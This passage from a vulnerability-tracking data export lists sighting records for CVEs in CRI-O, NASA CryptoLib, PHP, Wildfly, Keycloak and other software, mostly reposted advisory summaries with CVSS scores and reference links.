CVE-2024-8676\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn't have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.\n\ud83d\udccf Published: 2024-11-26T19:15:48.475Z\n\ud83d\udccf Modified: 2025-04-03T10:28:35.970Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:10826\n2. https://access.redhat.com/errata/RHSA-2025:0648\n3. https://access.redhat.com/errata/RHSA-2025:1908\n4. https://access.redhat.com/errata/RHSA-2025:3297\n5. https://access.redhat.com/security/cve/CVE-2024-8676\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2313842", "creation_timestamp": "2025-04-03T10:35:13.000000Z"}, {"uuid": "9246e93e-a0c4-4b5d-af38-ac81a41d5579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6W2X-W7W3-85W2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10022", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30356\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. In 1.3.3 and earlier, a heap buffer overflow vulnerability persists in the Crypto_TC_ApplySecurity function due to an incomplete validation check on the fl (frame length) field. Although CVE-2025-29912 addressed an underflow issue involving fl, the patch fails to fully prevent unsafe calculations. As a result, an attacker can still craft malicious frames that cause a negative tf_payload_len, which is then interpreted as a large unsigned value, leading to a heap buffer overflow in a memcpy call.\n\ud83d\udccf Published: 2025-04-01T22:06:22.576Z\n\ud83d\udccf Modified: 2025-04-01T22:06:22.576Z\n\ud83d\udd17 References:\n1. https://github.com/nasa/CryptoLib/security/advisories/GHSA-6w2x-w7w3-85w2\n2. https://github.com/nasa/CryptoLib/commit/59d1bce7608c94c6131ef4877535075b0649799c", "creation_timestamp": "2025-04-01T22:32:41.000000Z"}, {"uuid": "c93cc4b5-bc7e-41b1-93a6-afecdb18a0ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-524M-Q5M7-79MM", "type": "seen", "source": "Telegram/i2g9ck4oFpG2FQ6NO-wq7UgJ3FLiFKBZXo4--EYsPHmrFO0", "content": "", "creation_timestamp": "2026-01-10T07:01:39.000000Z"}, {"uuid": "b8974dde-27e2-488b-8ecf-fcc7078b2d63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0429", "type": "seen", "source": "Telegram/bfwzVOsJpKBGXVGbU-fAyqvN9ntDEQLmDKUbUw5_xZxXiao", "content": "", "creation_timestamp": "2026-01-12T04:00:54.000000Z"}, {"uuid": "2f58ad78-1d5c-4de3-b34e-ddcefacbc3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GGXR-H6FM-P2QH", "type": "seen", "source": "Telegram/i2g9ck4oFpG2FQ6NO-wq7UgJ3FLiFKBZXo4--EYsPHmrFO0", "content": "", "creation_timestamp": "2026-01-10T07:01:39.000000Z"}, {"uuid": "7bef654e-824a-4cda-9fe3-9e8ce5b35b33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78P6-6878-8MJ6", "type": "seen", "source": "Telegram/i2g9ck4oFpG2FQ6NO-wq7UgJ3FLiFKBZXo4--EYsPHmrFO0", "content": "", "creation_timestamp": "2026-01-10T07:01:39.000000Z"}, {"uuid": "f99448cb-cda3-405c-8bc2-4453c59224fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4H2-49XF-VQ72", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10155", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31484\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: conda-forge infrastructure holds common configurations and settings for key pieces of the conda-forge infrastructure.\nBetween 2025-02-10 and 2025-04-01, conda-forge infrastructure used the wrong token for Azure's cf-staging access. This bug meant that any feedstock maintainer could upload a package to the conda-forge channel, bypassing our feedstock-token + upload process. The security logs on anaconda.org were check for any packages that were not copied from the cf-staging to the conda-forge channel and none were found.\n\ud83d\udccf Published: 2025-04-02T21:38:03.493Z\n\ud83d\udccf Modified: 2025-04-02T21:38:03.493Z\n\ud83d\udd17 References:\n1. https://github.com/conda-forge/infrastructure/security/advisories/GHSA-m4h2-49xf-vq72\n2. https://github.com/conda-forge/infrastructure/commit/70f3f09e64968d5f0a7b0525846f17cad42dd052", "creation_timestamp": "2025-04-02T22:34:43.000000Z"}, {"uuid": "f2fe7321-c051-4228-9a5d-0103ff31fc1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1468", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11193", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11831\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.\n\ud83d\udccf Published: 2025-02-10T15:27:46.732Z\n\ud83d\udccf Modified: 2025-04-10T03:57:34.220Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1334\n2. https://access.redhat.com/errata/RHSA-2025:1468\n3. https://access.redhat.com/security/cve/CVE-2024-11831\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2312579\n5. https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\n6. https://github.com/yahoo/serialize-javascript/pull/173", "creation_timestamp": "2025-04-10T04:49:05.000000Z"}, {"uuid": "acdb6893-6970-4f2f-b0b6-e5b18d300e5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52JP-HRPF-2JFF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9544", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1861\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In PHP from 8.1.* before 8.1.32, from 8.2.* before 8.2.28, from 8.3.* before 8.3.19, from 8.4.* before 8.4.5, when parsing HTTP redirect in the response to an HTTP request, there is currently limit on the location value size caused by limited size of the location buffer to 1024. However as per RFC9110, the limit is recommended to be 8000. This may lead to incorrect URL truncation and redirecting to a wrong location.\n\ud83d\udccf Published: 2025-03-30T05:57:57.894Z\n\ud83d\udccf Modified: 2025-03-30T05:57:57.894Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-52jp-hrpf-2jff", "creation_timestamp": "2025-03-30T06:32:00.000000Z"}, {"uuid": "b6a414f5-819a-4530-80b3-147c158b527b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6P9Q-P2Q4-3RQX", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9758", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-29766\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. Tuleap has missing CSRF protections on artifact submission &amp; edition from the tracker view. An attacker could use this vulnerability to trick victims into submitting or editing artifacts or follow-up comments. The vulnerability is fixed in Tuleap Community Edition 16.5.99.1741784483 and Tuleap Enterprise Edition 16.5-3 and 16.4-8.\n\ud83d\udccf Published: 2025-03-31T15:38:00.273Z\n\ud83d\udccf Modified: 2025-03-31T18:36:27.728Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-6p9q-p2q4-3rqx\n2. https://github.com/Enalean/tuleap/commit/81f45330fdcc1329cc71eddf4d04b80c340b3b93\n3. https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&amp;h=81f45330fdcc1329cc71eddf4d04b80c340b3b93\n4. https://tuleap.net/plugins/tracker/?aid=42208", "creation_timestamp": "2025-03-31T19:31:25.000000Z"}, {"uuid": "4e2b2d42-7d3c-493a-9234-8fd447f4b6f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GX8M-F3MP-FG99", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9446", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-35621\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A cross-site scripting (XSS) vulnerability in the Edit function of Formwork before 1.13.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Content field.\n\ud83d\udccf Published: 2024-05-28T15:40:26.625Z\n\ud83d\udccf Modified: 2025-03-28T19:08:37.901Z\n\ud83d\udd17 References:\n1. https://github.com/getformwork/formwork/security/advisories/GHSA-gx8m-f3mp-fg99", "creation_timestamp": "2025-03-28T19:29:17.000000Z"}, {"uuid": "830951ed-77e1-4467-9bbb-380abd5d8109", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HGF5-96FM-V528", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1736\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In PHP from 8.1.* before 8.1.32, from 8.2.* before 8.2.28, from 8.3.* before 8.3.19, from 8.4.* before 8.4.5, when user-supplied headers are sent, the insufficient validation of the end-of-line characters may prevent certain headers from being sent or lead to certain headers be misinterpreted.\n\ud83d\udccf Published: 2025-03-30T05:49:14.551Z\n\ud83d\udccf Modified: 2025-03-30T05:49:14.551Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-hgf5-96fm-v528", "creation_timestamp": "2025-03-30T06:32:01.000000Z"}, {"uuid": "460ae849-8f22-4b78-9e45-412d4b55c522", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P3X9-6H7P-CGFC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9547", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1219\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In PHP from 8.1.* before 8.1.32, from 8.2.* before 8.2.28, from 8.3.* before 8.3.19, from 8.4.* before 8.4.5, when requesting a HTTP resource using the DOM or SimpleXML extensions, the wrong content-type\u00a0header is used to determine the charset when the requested resource performs a redirect. This may cause the resulting document to be parsed incorrectly or bypass validations.\n\ud83d\udccf Published: 2025-03-30T05:33:13.801Z\n\ud83d\udccf Modified: 2025-03-30T05:33:13.801Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-p3x9-6h7p-cgfc", "creation_timestamp": "2025-03-30T06:32:02.000000Z"}, {"uuid": "a492ee49-d5d6-4f5d-8bb3-ca25db611473", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V8XR-GPVJ-CX9G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9534", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1217\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/AU:Y/R:A)\n\ud83d\udd39 Description: In PHP from 8.1.* before 8.1.32, from 8.2.* before 8.2.28, from 8.3.* before 8.3.19, from 8.4.* before 8.4.5, when http request module parses HTTP response obtained from a server, folded headers are parsed incorrectly, which may lead to misinterpreting the response and using incorrect headers, MIME types, etc.\n\ud83d\udccf Published: 2025-03-29T05:19:33.696Z\n\ud83d\udccf Modified: 2025-03-29T05:19:33.696Z\n\ud83d\udd17 References:\n1. https://github.com/php/php-src/security/advisories/GHSA-v8xr-gpvj-cx9g", "creation_timestamp": "2025-03-29T06:28:40.000000Z"}, {"uuid": "61f095ae-1543-477a-b648-a332d2120a03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0648", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10194", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8676\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn't have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.\n\ud83d\udccf Published: 2024-11-26T19:15:48.475Z\n\ud83d\udccf Modified: 2025-04-03T10:28:35.970Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:10826\n2. https://access.redhat.com/errata/RHSA-2025:0648\n3. https://access.redhat.com/errata/RHSA-2025:1908\n4. https://access.redhat.com/errata/RHSA-2025:3297\n5. https://access.redhat.com/security/cve/CVE-2024-8676\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2313842", "creation_timestamp": "2025-04-03T10:35:13.000000Z"}, {"uuid": "02a1cb35-16dd-42a1-a4ec-b0590764ea2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8V8X-CX79-35W7", "type": "seen", "source": "Telegram/hIscdD1HJtLSg0SDRbuSjzrqCFMwM_v_5SX0wjW8Bk7vM6o", "content": "", "creation_timestamp": "2026-01-10T04:02:20.000000Z"}, {"uuid": "49f61fb5-15ac-4bcf-80f1-44ba59c14108", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR8X-PXM6-PRJG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9990", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-24057\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: HL7 (Health Level 7) FHIR Core Libraries before 5.6.92 allow attackers to extract files into arbitrary directories via directory traversal from a crafted ZIP or TGZ archive (for a prepackaged terminology cache, NPM package, or comparison archive).\n\ud83d\udccf Published: 2023-01-24T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-01T19:26:42.787Z\n\ud83d\udd17 References:\n1. https://github.com/HL7/fhir-ig-publisher/security/advisories/GHSA-xr8x-pxm6-prjg", "creation_timestamp": "2025-04-01T19:32:26.000000Z"}, {"uuid": "bcb1b4f0-128d-4170-97e4-8d646d00e0c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3CGP-3XVW-98X8", "type": "seen", "source": "Telegram/hIscdD1HJtLSg0SDRbuSjzrqCFMwM_v_5SX0wjW8Bk7vM6o", "content": "", "creation_timestamp": "2026-01-10T04:02:20.000000Z"}, {"uuid": "be43bcd4-983f-4ff8-aab0-1f53c5cb06a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9JCX-V3WJ-WH4M", "type": "seen", "source": "Telegram/hIscdD1HJtLSg0SDRbuSjzrqCFMwM_v_5SX0wjW8Bk7vM6o", "content": "", "creation_timestamp": "2026-01-10T04:02:20.000000Z"}, {"uuid": "e6903476-36f7-4a3c-9f20-be1c45799eb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5FP7-G646-CCF4", "type": "published-proof-of-concept", "source": "Telegram/xCOXvC0nHIdc2RZU8QnHf4AhOuGrMPNqhpiQVHQJKZvyIjM", "content": "", "creation_timestamp": "2026-01-10T04:02:47.000000Z"}, {"uuid": "796e3190-b48a-4341-8e4f-d9fb51e67f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5CW-625J-3RXH", "type": "published-proof-of-concept", "source": "Telegram/xCOXvC0nHIdc2RZU8QnHf4AhOuGrMPNqhpiQVHQJKZvyIjM", "content": "", "creation_timestamp": "2026-01-10T04:02:47.000000Z"}, {"uuid": "3829cea9-5a24-42d4-8048-38e1023d1250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JRMJ-C5CX-3CW6", "type": "seen", "source": "Telegram/Oq5Ood_4NS_q2MjX-UETlnapDxCUgYA-dHZPJ_gTTRAs320", "content": "", "creation_timestamp": "2026-01-10T05:03:11.000000Z"}, {"uuid": "687a8656-3a80-4838-8217-5e4b1a8c8569", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFFG-7V8V-79J3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9906", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30354\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: Bruno is an open source IDE for exploring and testing APIs. A bug in the assertion runtime caused assert expressions to run in Developer Mode, even if Safe Mode was selected. The bug resulted in the sandbox settings to be ignored for the particular case where a single request is run/sent. This vulnerability's attack surface is limited strictly to scenarios where users import collections from untrusted or malicious sources. The exploit requires deliberate action from the user\u2014specifically, downloading and opening an externally provided malicious Bruno collection. The vulnerability is fixed in 1.39.1.\n\ud83d\udccf Published: 2025-04-01T14:21:39.625Z\n\ud83d\udccf Modified: 2025-04-01T14:21:39.625Z\n\ud83d\udd17 References:\n1. https://github.com/usebruno/bruno/security/advisories/GHSA-hffg-7v8v-79j3", "creation_timestamp": "2025-04-01T14:33:08.000000Z"}, {"uuid": "e3e03c9f-8667-4c4a-9a43-45b21c8a17cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XG7-MWMP-XMJX", "type": "published-proof-of-concept", "source": "Telegram/xCOXvC0nHIdc2RZU8QnHf4AhOuGrMPNqhpiQVHQJKZvyIjM", "content": "", "creation_timestamp": "2026-01-10T04:02:47.000000Z"}, {"uuid": "1ca74051-bdc3-4afe-8c41-1bdc66e6715e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJRP-XGMH-X9QQ", "type": "published-proof-of-concept", "source": "Telegram/xCOXvC0nHIdc2RZU8QnHf4AhOuGrMPNqhpiQVHQJKZvyIjM", "content": "", "creation_timestamp": "2026-01-10T04:02:47.000000Z"}, {"uuid": "3c69926a-e1b7-4d4a-b78a-d84d32a3d9c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3467", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9892", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23367\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Wildfly Server Role Based Access Control (RBAC) provider. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. \nThe vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.\n\ud83d\udccf Published: 2025-01-30T14:30:04.227Z\n\ud83d\udccf Modified: 2025-04-01T13:15:24.222Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:3465\n2. https://access.redhat.com/errata/RHSA-2025:3467\n3. https://access.redhat.com/security/cve/CVE-2025-23367\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2337620\n5. https://github.com/advisories/GHSA-qr6x-62gq-4ccp", "creation_timestamp": "2025-04-01T13:32:37.000000Z"}, {"uuid": "71bc71b4-ffc1-4d8b-9021-98693511de0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR6X-62GQ-4CCP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9892", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23367\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Wildfly Server Role Based Access Control (RBAC) provider. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. \nThe vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.\n\ud83d\udccf Published: 2025-01-30T14:30:04.227Z\n\ud83d\udccf Modified: 2025-04-01T13:15:24.222Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:3465\n2. https://access.redhat.com/errata/RHSA-2025:3467\n3. https://access.redhat.com/security/cve/CVE-2025-23367\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2337620\n5. https://github.com/advisories/GHSA-qr6x-62gq-4ccp", "creation_timestamp": "2025-04-01T13:32:37.000000Z"}, {"uuid": "fbe62d9f-d1fb-41d0-91c4-0c2c971e96d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3465", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9892", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23367\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the Wildfly Server Role Based Access Control (RBAC) provider. When authorization to control management operations is secured using the Role Based Access Control provider, a user without the required privileges can suspend or resume the server. A user with a Monitor or Auditor role is supposed to have only read access permissions and should not be able to suspend the server. \nThe vulnerability is caused by the Suspend and Resume handlers not performing authorization checks to validate whether the current user has the required permissions to proceed with the action.\n\ud83d\udccf Published: 2025-01-30T14:30:04.227Z\n\ud83d\udccf Modified: 2025-04-01T13:15:24.222Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:3465\n2. https://access.redhat.com/errata/RHSA-2025:3467\n3. https://access.redhat.com/security/cve/CVE-2025-23367\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2337620\n5. https://github.com/advisories/GHSA-qr6x-62gq-4ccp", "creation_timestamp": "2025-04-01T13:32:37.000000Z"}, {"uuid": "b1fdebf4-7a9b-4888-9c80-75d64ad327dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7861", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10160", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6291\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)\n\ud83d\udd39 Description: A flaw was found in the redirect_uri validation logic in Keycloak. This issue may allow a bypass of otherwise explicitly allowed hosts. A successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "12facd99-7695-489a-b317-5928981ac412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3FM2-XFQ7-7778", "type": "published-proof-of-concept", "source": "Telegram/WQqRawnFxdQj2C7QSZvJhJYu2ip6AHddUppaVRsAsIpfVRo", "content": "", "creation_timestamp": "2026-01-10T08:01:06.000000Z"}, {"uuid": 